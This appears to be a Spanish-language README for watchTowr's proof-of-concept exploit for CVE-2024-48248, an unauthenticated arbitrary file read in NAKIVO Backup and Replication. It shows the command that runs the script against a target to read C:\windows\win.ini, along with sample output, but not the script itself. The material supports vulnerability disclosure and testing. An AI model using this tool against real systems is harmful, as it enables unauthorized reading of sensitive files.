
Prueba de concepto de explotación para CVE-2024-48248, que demuestra la lectura arbitraria de archivos sin autenticación en NAKIVO Backup and Replication Solution. Incluye un script de Python para probar las versiones afectadas.
Prueba de concepto de lectura arbitraria de archivos sin autenticación en NAKIVO Backup and Replication Solution
Consulta nuestro artículo de blog para obtener detalles técnicos
python3 watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py --url https://192.168.1.1:4443 --file "C:\\windows\\win.ini"
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py
(*) Nakivo Unauthenticated Arbitrary File Read (CVE-2024-48248) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2024-48248]
[*] Targeting https://192.168.1.1:4443
[*] Attempting to read file 'C:\windows\win.ini'
[*] File Contents:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Este script es una prueba de concepto para CVE-2024-48248, dirigida a NAKIVO Backup and Replication Solution. Más detalles se describen en nuestro [artículo de blog] (https://labs.watchtowr.com/).
Para las últimas investigaciones de seguridad, sigue al equipo de Labs de watchTowr